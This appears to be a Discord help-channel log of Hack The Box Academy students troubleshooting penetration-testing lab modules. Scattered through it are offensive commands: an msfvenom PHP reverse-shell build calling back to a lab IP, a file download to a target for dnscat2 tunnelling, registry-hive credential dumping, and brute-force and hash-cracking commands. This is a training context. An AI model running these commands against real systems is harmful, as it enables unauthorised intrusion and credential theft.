ip from hb to check telnet host
it should display the open telnet port on the host, but it doesn't
I think getting started module service scanning section
start module (meow)
yes
what?
nmap -sVC -p- 10.129.180.54
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-10 19:46 +04
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.54 seconds
starting point?
yes
read #welcome , get verified and ask in #starting-point
Add the -Pn command to it
nmap -sVC -Pn -p- <target_ip>
if hydra shows password found you should be able to login
I tried logging in on the site itself and the pages refreshes without any error codes or pop-up messages after entering in creds
I thought I could automate the login attempt via cURL and it would show me the HTML source of the HTB{} flag, but it did not
idk what section you're doing but if you were to submit a login over an http form it will be more difficult with curl
reset the target and try again
still scanning
Hey guys, i am stuck on this question from the documentation & reporting module
Connect to the testing VM using Xfreerdp and practice testing, documentation, and reporting against the target lab. Once the target spawns, browse to the WriteHat instance on port 443 and authenticate with the provided admin credentials. Play around with the tool and practice adding findings to the database to get a feel for the reporting tools available to us. Remember that all data will be lost once the target resets, so save any practice findings locally! Next, complete the in-progress penetration test. Once you achieve Domain Admin level access, submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host.
I just don't know how to get it to work, any tips are appreciated, thank you
i can give you a few tips
Regarding the brute forcing skills Assessment, im on the ssh Part where you need to create your custom wordlist. The password policy, meaning 8 chars or longer, special chars and numbers should also be taken into consideration correct?
Im currently going through Linux fundamentals. Does anyone have any good docs for regex commands? Man grep and 7 regex doesn’t really provide info on operators to work out patterns that begin or end. I realised I had to use \b to find ending patterns but via stackoverflow discovery. I’d like to make a cheat sheet.
regex101.com is a nice playground
hello
in the module attacking common service the question in the dns section: Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
i added the target to the resolvers.txt file, but get always the message: Warning: No nameservers found, trying fallback list.
why is that?
What exactly is in your resolvers.txt file?
send me the command you are using via DM.
can anyone guide me about htb student subs...???
What exactly do you want to know?
Are the EU VPN facing issues rn?
aaaahhhh found my mistake 😉
i want to know: if i subscribe, then after the end of the month, can i go through the modules i completed later or not? like, are the modules only open in subs..???
once you buy a module with cubes you keep it forever
All modules that you have completed 100% during the subscription period are yours. You can no longer access all other modules once the subscription has expired.
ok thanks
Except, of course, the ones you bought with cubes. These are always yours.
where?
hey guys ........ i think there is something wrong in here
i'm doing the Nmap module and i reached this part.
can somebody explain to me how the tcp connect scan is more stealthy than the syn scan?
cause i thought that initiating a full connection (3 way handshake) will trigger alerts.
the SYN scan does not complete the 3-way handshake which may be indicative of network/port scanning
an unfinished TCP handshake is more suspicious than a completed handshake
DACL attacks, I'm trying to dump the SAM & SYSTEM registry hives and it dumps SAM, but it hangs after that and doesn't dump SYSTEM. I tried a couple different versions of impacket but they all result in the same thing. Am I doing something wrong?
thanks man for the help ......i really appreciate it !
Thanks brosef
yess please!
I'm having the same problem on the attackbox, this is making the module impossible to complete.
dm
Attacking Enterprise Networks - Web Enumeration & Exploitation. There is a section on http verb tampering on dev.inlanefreight.local.
I keep getting a communication error/no route to host when using burp on this part. Burp works on regular sites and the other vhosts. I do get the expected results when using curl. But when using burp I get communication error/no route to host.
I resolved it. Posting resolution here - nano/hosts had previous IPs not hashed out that had the dev.inlanefreight.local. Removed, restarted good to go.
alright i think i found my problem - it takes a long time lol. gotta wait like 5+ mins
hmm actually it only worked on the attackbox like that, not working on the vm, seems to be timing out.
you can dump it one buy one and save it locally, then get the file over smb
not sure what you mean. the files are dumped without issue. the problem is retrieving the files over smb via reg.py
yeah you save it on the system itself then retrive it with smbclient instead of doing everything at once
Working with IDS/IPS
Intrusion Detection With Zeek
There is a file named revilkaseya.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to the REvil ransomware Kaseya supply chain attack. Enter the total number of bytes that the victim has transmitted to the IP address 178.23.155.240 as your answer.
Dumb question but isn't it supposed to be the addition of everything in the length ?
I still don't get what you're saying. When I perform the steps on the attack box, it works. When I do it on my own VM, it doesn't.
it hangs after retrieving SAM.save and never grabs the other file
it also did fail on the attack box a couple times i had to do it a few times (same commands, never rebooted machine)
the only difference is i tried impacket v9 and v11, while the attackbox is using v10. maybe something is up there idk.
regardless the attackbox will allow me to complete this, although i'd like to be able to do it without the attackbox.
Can SB help me with the bash scripting module?
Im really stuck 😐
I even wrote the same script in node but I still don't get the flag :/
It works on the virtual linux machine but not on my mac 😮
save the reg dump on the target system itself, then retrieve it using smbclient after it's been saved, so that even if it fails, you can just download the file again instead of having to dump it again
SYSTEM hive will take the longest to transfer, the other two should be pretty quick
alright. thank you.
Anyone having trouble connecting with module target systems?
Thanks @fathom pendant
I tried different answers and nothing seems to work I don't know if I'm on the good thing
other people on the network trying to log into my smb server? [*] Incoming connection (190.217.48.58,54787), also getting connections from other random addresses that aren't mine
i cannot get this dang flag because the system won't transfer this reg file
Did you try to do it via VirtualBox, and create the server on VB? When I did it, it worked... Or anybody scanning you 😄 😄 😄
Hello people
Is it just me who sometimes feels that it is impossible to finish studying, or am I really stupid? 😄 Sometimes I don't have the strength, and I feel like giving up
this is me 80% of the time
sometimes you just need to take a break and have fresh eyes on it. i find sometimes i get lost in the weeds and just need to come back and rethink it simpler
I am actually doing something like a preparation course for an ethical hacking company, and still learning on portswigger, and on htb academy too... But sometimes I think that it's my end, and I am the most stupid man in the world 😄 :D :D
i can't... because i am the type of person who, if i take a break one day, will say "i will do it tomorrow" and again, and again... 😄 It's harder to start than to stop 😄
taking regular 1 hour breaks during study sessions is OK
ahaaaaa, this you thought, yes, its true 🙂
you can also take a break in between modules, like i just finished the yara and sigma module and i'm taking a break before going into digital forensics
and if you're itching for something to test your knowledge, there's always HTB main platform
wireshark has analysis features for this that show you how much traffic moves between two ips. If you add up just the length you may add up headers too
i have one topic every week... For example, now i'm studying LFI/RFI, but a week ago it was SSRF...
check statistics -> conversations
I tried it but it still doesn't work
ipv4 tab?
yes ive tried it aswell
can i dm you
can you remove the display filter and enlarge the column for bytes? it shouldn't show kB
it still stays in kB for some reason
oh derp, you are doing zeek, you are not supposed to use wireshark. Basically look at the example number 3 again and do what they do there, there is a long command that leaves you with a list of ips and how much data gets exfiltrated
I'm getting this error for some reason
Hi, I'm new to capture the flag. I'm trying blockchain_russian_roulette, and I get from option 3 "get the flag": "conditions not satisfied". Any tip or help to figure it out? Thank you
this channel isn't for ctfs
#1204440084867325982 is for the ongoing ctf
I'm back: if this can help others:
Solution:
I use the scanner module from metasploit:
auxiliary(scanner/smb/smb_login)
it works for me as expected: trying all passwords for a given user before moving to the next user.
Thanks
careful with posting spoilers especially if the issue you were having was a user related issue - not a tool issue
:)
hello, i completed the section DCSync attack in AD, but when i try to do it using port forwarding it won't work. the first pivot works well from windows to ssh, but then i tried to double port forward using ssh dynamic port forwarding, and then tried to perform the command on my attack host but it didn't work
looks like a pivoting problem instead of a dcsync problem
What am I supposed to change this domain to for this to work?
yes
Assuming this is even because of the domain and not an issue with the dnscat2 app itself
i had socks5 and socks4 on my proxyconfig file lol
i fixed it now
ecdsa is some crypto stuff, sounds like you are missing some library install or something
dnscat has a similar error on their github and suggests installing ruby-dev
I'm having similar issues with chisel now. I uploaded it to the pivot host but the pivot host is missing the lib files necessary to run chisel
I can't install go on it and I can't update the libraries on the pivot host, so I'm not sure what to do with this exercise. The module certainly doesn't address it.
Is it just me or was CBBH's server side skill assessment anti-climactic? Or did I do something wrong?
I was able to answer the module questions by doing a standard proxychains port forward, but it sucks that I can't get the tools the lessons want me to use to work.
Hey guys, I'm on the "Nosql injections" module at the moment and I'm stuck on the skills assessment #2. || I've tried to inject into all parameters on various endpoints (/login, /forgot, /reset), I heard it has something to do with time based injections which I also tried but sadly couldn't make anything work|| Any hints? Thank you 🙂
Take a close look at the message on the website when you log in. Do you notice anything?
Do you mean the placeholders 😄
I actually tried quite a few queries based on those values
I feel like I'm over complicating things here 😂
Yes exactly, try the placeholder. Then try something that certainly doesn't exist.
You need to compile chisel statically. Or download a pre-compiled binary of it
The reason it doesn't work is bc your version of glibc that you compiled chisel with isn't the same as the target
I'm guessing it's the time difference in the responses ya?
This should also work, ||but take a close look at the two messages||
Exactly, you're not gonna get a py3 program to run on py2
I spent like 15 mins manually changing all the errors in the python2.7 version of server.py to python3 and it was for nothing lol
I mean, you can just install python2.7
I'm guessing I have to find it online since I can't apt install it
You might be able to install with pip
Gotcha, I think I spotted that little difference, but why does it happen though? ||That combination from the placeholder is also not valid no?|| Edit : Ahh I think I get it. Thanks a ton Mr. Bunny!
Also I had no issues installing 2.7 on my machine
I tried. I keep getting the error: externally-managed-environment result
I get that with a lot of pip install attempts
And now this
Real-Time protection is running
Is that in Windows Security? All those options are turned off.
I believe so
It's specifically under Virus & threat protection
Found it, and it worked.
Network Enumeration with NMAP, chapter "Host Discovery" is confusing me. What exactly is the IP target I should scan? I've tried to start the workstation instance and ran a test with the last IP shown in the examples, but the host seems down (even with -Pn I can't get results, coz the system gets stalled)
usually at the very bottom in the question area there's a link you click to start up the victim box
after it starts it shows the ip there
there is no button 😦
it doesn't say do the scan yourself it just says based on the last result.. so the answer is probably on that same page? what's the hint say?
idk i didn't do that module so..
That was bad reading. My bad, guys! Thank you!
Struggling with https://academy.hackthebox.com/module/113/section/2139 (Attacking Thick Client Applications) and could use a hand if anyone is able.
I've successfully completed the steps up to "run again the Restart-OracleService.exe and check the temp folder. The file 6F39.bat is created under the C:\Users\cybervaca\AppData\Local\Temp\2" - but rerunning Restart-OracleService.exe doesn't seem to generate the files as advertised 🤔
what's the step before that
Is there a worse section in the CPTS than the Thick client sections in Attacking Client Applications... So frustrated, got through the first one and now stuck on the FTP client one... Would be fine if the Windows VM wasn't so slow...
its because the steps are straight up wrong
so you have to deep dive outside the module on how to compile java
walkthrough of a retired insane machine: Fatty has helped many
i get the exercise but it's pretty advanced for a medium module, it should be reworked to explain it better
I am watching Ippsec's video on Fatty right now
the addition of this section was highly contentious when it came out
his video didn't help me at all
he uses a completely different tool and you can't dl stuff on that box
people did NOT like it; and they updated it to be slightly better
the commands they give are wrong too
you can't dl stuff to the machines in the labs either
it's all about tool transfers
yeah but you shouldn't need to do that
¯\_(ツ)_/¯
the module itself should contain everything required to pass the questions. simple as that.
you should not need outside resources and learning about a tool completely irrelevant to the module's spirit
if it does do that, then it needs to hand hold you, not force you to go outside the module. especially when the commands it gives you to paste are straight up wrong
and it does not explain the command you're running at all
again this section was a late addition and definitely not proofread
i watched the fatty video, skipped to the end to see the ip, and put that in the answer box and moved on
the rest of the module was absolutely awesome
it's also possible you're doing something incorrect and trying to blame the module ¯\_(ツ)_/¯
but if you're saying you followed it 1::1 then i'll believe you
yeah, you can't follow it 1:1
i just completed that yesterday
I recently ran into a challenge where I was given a Java Jar file that I needed to analyze and patch to exploit. I didn’t find many good tutorials on how to do this, so I wanted to get my notes down. For now it’s just a cheat sheet table of commands. Updated 8 Aug 2020: Now that Fatty from HackTheBox has retired, I’ve updated this post to reflec...
Oh Jesus
Listen the thick applications part is seriously out of place.
It's not easy for anybody.
Changing the folder permissions.
(Now very much not looking forward to the rest of it 🙈)
did you complete that part? after that i found it a bit buggy, i had to start and ctrl-c and start the service a couple times
so try messing with the executable like that and it should dump it
I did, yeah, still no files being generated though 🤷
I ran the restart 5 or 6 times (which took a billion years).
Guess I'll try and reset the VM and try again 😔
Thank you
How did you install dnscat2? It requires the ecdsa library, which can be installed via sudo gem install ecdsa. Or run bundle install if you're trying to run it directly out of its directory.

💀
DACL attacks - Change the credentials for the account Yolanda. Then, connect to the shared folder \DC01\yolanda\ and submit the contents of flag.txt as the answer. How am I supposed to grab this flag? yolanda doesn't have rights to connect to the computer, after changing her creds i can't get into the share folder with them to get the flag either. can't do it with smbclient, cme, or manually going to the folder and entering the password on the windows host.
why wouldn't the user have the rights to access their own folder?
Welp, I give up for now. If anyone knows what I'm doing wrong, I'd greatly appreciate a DM that I can follow up later 🤷
i'm sure i'm just missing something obvious otherwise this box is busted
the creds successfully authenticate, but she doesn't have perms to anything
wtf is this section
I have no idea, I'm like two steps in and already pulling my hair out. When looking things up to try and find out what I have wrong, all I'm seeing are a mountain of complaints and criticisms of this section. Feels like bruteforcing the answer and skipping it may be the way forward 😂
this section is absolutely insane
Pls send hlp.
Password attacks under a password shadow and o password. Hashcat is jammed up and is asking me to click status pause bypass checkpoint or quit. I can’t get it to work. Hashcat -O -m 1800 root.hash mutated.list -o cracked.hash
it's not jammed up; that's literally just how hashcat shows it's working
I also don't see a -O option for hashcat but it's been a minute since i looked at the docs
oh right -O is optimized kernels
which is highly unnecessary
if anyone can nudge me with this dacl thing that'd be cool
really not sure what i'm doing wrong it says to change yolanda's password and use that to get the flag on her folder, the password change is successful but there's no way to log in to the box with her creds and she doesn't seem to have access to that folder
Boxes are addicting like a drug. Can’t stop won’t stop
wow, randomly it worked this time
need some help on DNS Tunneling with Dnscat2.. the part where you first get on PS on the target, you run the cmd "Import-Module .\dnscat2.ps1" i get an error saying it wasn't loaded because no valid module.. how am i supposed to import the file, it gets totally glossed over..
.\ implies the tool is in the current directory
otherwise you either need to move to the directory or use the full filepath
yeah looks like i need to go back and look up upload methods
is it not in C:\tools?
theres no tools dir
file transfers it is then
just host a web server on your attack box with the dnscat2.ps1 and use invoke-webrequest from powershell
okay trying that.. used "python3 -m http.server" on the attack host. on the target host, using PS i run "invoke-webrequest -URI http://10.10.14.20:8000/home/kali/dnscat2-powershell/dnscat2.ps1" and i see on my attack host myself connecting, however with the error that the file doesn't exist. i double checked.. it's there
you need to specify the -outfile
also: that's not how http.server works
http.server launches the server from the directory you're currently in
you can't do arbitrary file read/download with it
so unless for some reason you started it from filesystem-root: specifying the full path does nothing
so i have to run from the dir /dnscat2-powershell/ ? but even so, like you said i cant download from it..
your url is wrong
when you use python -m http.server, it serves out of the folder you executed the command in
that's not what I said
what I said is you don't specify the full filepath
so it's looking for /home/kali/home/kali/dnscat2-powershell/dnscat2.ps1
actually it's /home/kali/dnscat2-powershell/home/kali/dnscat2-powershell/dnscat2.ps1
ahh yeah lol
whenever you run any fileshare (unless specified) it will always launch from the current directory
meaning any shared files can ONLY be accessed via that directory
you can't specify/directory traverse backwards only forward

and so can anyone that incidentally accesses your tun0 ip via the vpn network
very helpful peeps, i got it
when i try to install oracle_xs it says hint: See PEP 668 for the detailed specification.
error: externally-managed-environment
× This environment is externally managed
╰─> To install Python packages system-wide, try apt install
python3-xyz, where xyz is the package you are trying to
install.
If you wish to install a non-Debian-packaged Python package,
create a virtual environment using python3 -m venv path/to/venv.
Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make
sure you have python3-full installed.
If you wish to install a non-Debian packaged Python application,
it may be easiest to use pipx install xyz, which will manage a
virtual environment for you. Make sure you have pipx installed.
See /usr/share/doc/python3.11/README.venv for more information.
note: If you believe this is a mistake, please contact your Python installation or OS distribution provider. You can override this, at the risk of breaking your Python installation or OS, by passing --break-system-packages.
hint: See PEP 668 for the detailed specification.
can someone help to fix? i use parrotOS htb edition
└──╼ $pip install cx_Oracle
try installing the package you need via apt
if it doesn't exist, either create a venv or use the --break-system-packages flag as specified in the error to install the package
using the venv was a bit annoying so i opted to potentially break my packages
verify your account through HTB -> #welcome
Thanks
i think you put 1 instead of l
and you should prob delete that
you aren't inputting the correct flag
hehe it happens
That's exactly what I was thinking lol.
Hey there, I am stuck on the clear text password for ipmi https://academy.hackthebox.com/module/112/section/1245 I have the username, the metasploit exploit brought out the username but the hashed password, the example showed the actual password. ATM i'm running john the ripper to try to crack the hash, am i on the right track?
If you have the hash, then crack it ¯\_(ツ)_/¯
Hi all, I could use some help! 🙂
Module: Password Attacks
Section: Password Attacks Lab - Medium
Question: I can see that SSH is open and SMB. I've tried to bruteforce login with Hydra on SMB and SSH. But with no luck. I've tried the mut.password.list and the normal password.list, but I don't get any results. Can anyone nudge me in the right direction?
enumerate smb further.
FILE UPLOAD ATTACKS -->Upload Exploitation
I've uploaded a rev shell from pentest monkey (with edited LHOST and LPORT) and uploaded a msfvenom custom rev shell (msfvenom -p php/reverse_php LHOST=10.10.14.232 LPORT=1337 -f raw > reverse.php)
Ncat on port 1337 (defined as lport) but nothing when i open the files via download URL.
Tried also webshells (custom and phpbash) but nothing more than a blank page without any error or output.
Found it 🙂
are password attacks as hard as others say?
Yes and no. Imo it's easy to get exhausted but everything in the module is very well explained.
I'm pretty lost. I found two users while enumerating further. I put them into a custom list, so it would be faster to bruteforce. Still no hit on password.
Am I on the wrong path or is my syntax wrong?
hey guys, i just want to confirm if cubes obtained from monthly subscription expire?
yes they remain
okay great, thanks
np
I dont think you need to bruteforce anything.
||what did you find in smb?||
I found a sharedrive but I can't list it.
I am sure you have a read access to that share, connect to it and check its contents.
Yeeah, the worst part about it is that I tried to list it earlier, but I see now that I missed a /. Thanks a lot!
yes: the reason the example showed the cleartext is because the ipmi hash that the example had was in metasploit's default list.
also hashcat will get it probably faster
<@&861185840277487616> this clearly doesn't belong
@remote latch Keep the discussion on topic, and appropriate.
Hi I have just finished the Footprinting module so what to pick up next? Is there any sensible order to pick the modules?
well if you're doing the cpts path: do them in order
each module overview, if you read them, has a "it's suggested you have a firm understanding of these modules:" then lists the modules it believes would be the pre-requisites for you to fully grasp the concepts
this question doesn't make any sense to me. why is there an FTP server running?
when i scan the port using nmap these are the list of ports found
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-11 07:00 EDT
Nmap scan report for 94-237-48-205.uk-lon1.upcloud.host (94.237.48.205)
Host is up (0.15s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
19/tcp filtered chargen
22/tcp open ssh
25/tcp filtered smtp
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
32785/tcp open unknown
33899/tcp open unknown
49999/tcp open unknown
How would i know to use FTP to brute force as the other user?
indeed you have a point
because there can be an ftp server running... it's not like ssh and ftp are mutually exclusive services
also it looks like ftp is an internal service
not visible to the outside
which is why it states "once you ssh in, try brute forcing"
meaning that ssh in --> bruteforce is how i interpreted but I could be wrong on that
you're right Ftp is in fact internal according to the cheat sheet. i was trying to ftp using some kind of open FTP port like 21
i didn't know they could be internal
yes like any other service; they can be internally facing like SQL servers and such as evidenced by some of the early modules in the CPTS track (if you're using that)
FILE UPLOAD ATTACKS - does it make a difference whenever i upload a .php or a .php6 : .php is blocked by filter, now i want to get the same results with a non blocked extension but i cannot get it working. Don't know if there is any difference in possibilities.
sometimes people use double extensions i.e. .jpg.php or something like that
most filters only check the first or last .xyz
i have a problem in web attacks IDOR insecure APIs
i cannot press the Update profile button i tried restarting the target and still nothing...
perhaps intercept the request and see what's going on
I did just like that but before I find some records the subbrute prompted me with an error 😦
that's what i was trying to do but nothing is being intercepted...
restarted again and now it works💀
I'm on SQLMap Essentials, on Case#3 i have no idea where I'm going wrong, I've even copied someone else's command from a walkthrough but yet i can't get a 'flag3' table. Any ideas?
And to be fair i struggled a lot with case#2 as well, i don't feel like a lot of it has been explained as well as it is for some other modules. Any places i can learn it a bit more?
for subbrute section, i have waited more than 15 minutes, is this normal?
I'll post here. i hope it's the right channel:
I want to discuss the practicality of setting up a local "hack-a-box" and design it myself
i see the answer in your screenshot
or at least what leads to the answer
what ahahahaha
you completely overlooked it
my first question is if there's any legal issues in just the challenge itself. And another one what if I add a reward (say a lunch voucher) for completing. Would that be generally acceptable
ask support that question
this channel is for discussion of academy modules overall not setting up your own thing
Need to speak to a person? Learn how to reach our support via HTB Labs.
I can't because I need to verify somehow on website im not part of yet 😄 but I will prob do that later
your question will likely get buried here
the only people that can answer legal questions are support staff and such
do you think it would be fun if your neighbor setup a wireless network -> computer system with the SSID "hack me" or smth
¯\_(ツ)_/¯
as long as it's segregated from your used network
that way there's a separation between a vulnerable system and your home network
ye I happen to have some extra hardware. I doubt using any servers is allowable at all
found it AHAHAH i thought the flag would be the subdomain xD thanks
again though; this conversation doesn't belong here
this channel is for discussion and assistance with HTB academy modules
Module: "WINDOWS ATTACKS & DEFENSE"
I did RDP to bob machine, got hashes using rubeus.exe but to crack these hashes I am unable to ssh into kali machine
$ ssh kali@172.16.18.20
ssh: connect to host 172.16.18.20 port 22: Connection timed out
This is what I am getting
i take it you're trying to ssh into kali from the bob machine?
i literally restarted my target box just to make sure that was it 
hello i got a shell using noPac in AD module/bleeding edges vulns section but when i try to cd it says you need to provide full path
i tried cd c:\path\to\folder
and still same error
then don't cd, just use full path for everything 
that's what i don't understand, do you mean to just write the full path in the console ?
how can i switch directories without cd
don't cd, you can do anything you want from your current dir
i see
thanks man i figured it out now
if you can't SSH into kali from WS001, just crack the hash on your own VM
why there is no modules channel for each path?
will be happy to help people on the cwee path but there is a mess here I can't follow lol
because that would be needlessly clunky; not to mention not everyone doing the advanced modules that happen to lie in the CWEE path correlates to them doing the path
not to mention there's some paths (CPTS/CBBH) that share some modules
it's easy to search one channel for keywords than need to look in multiple channels
in the "network traffic analysis" module, in the guided lab of the wireshark, when i start to capture the packets on the interface "ENS224", the first TCP stream which i find contains "RST" flag which should not be there according to the given lab but somehow i am getting different packets... and unable to answer the questions... plzz help anyone...
run the capture for a while, then screencap what you get and post it here
i am DMing you personally
No DM ❌
actually i am new to discord... so i dont know how to post here in channels
AD Enumeration & Attacks Skills Assessment 1 just took my soul and reformed it
I am not the man I once was
so this is what i am getting
is that all the packets you captured?
yep... after some time, i noticed that all i was getting was the same repeating traffic
total i got around 166 packets before the traffic restarted
Which is somewhat intended to get repeated traffic
But getting the right traffic is also necessary right?
i am getting something else
every time
That way you don't have to just get lucky and capture a packet at just the right time, otherwise restart the lab
Also: you won't always get the same results as the examples
Sometimes the examples intentionally leave out a part that would basically reveal the answer to the question
you should just leave the packet capture running
the only TCP stream i found containing a username was "ANONYMOUS" and that's not the correct answer
Looks like some web traffic, though the 4444 seems odd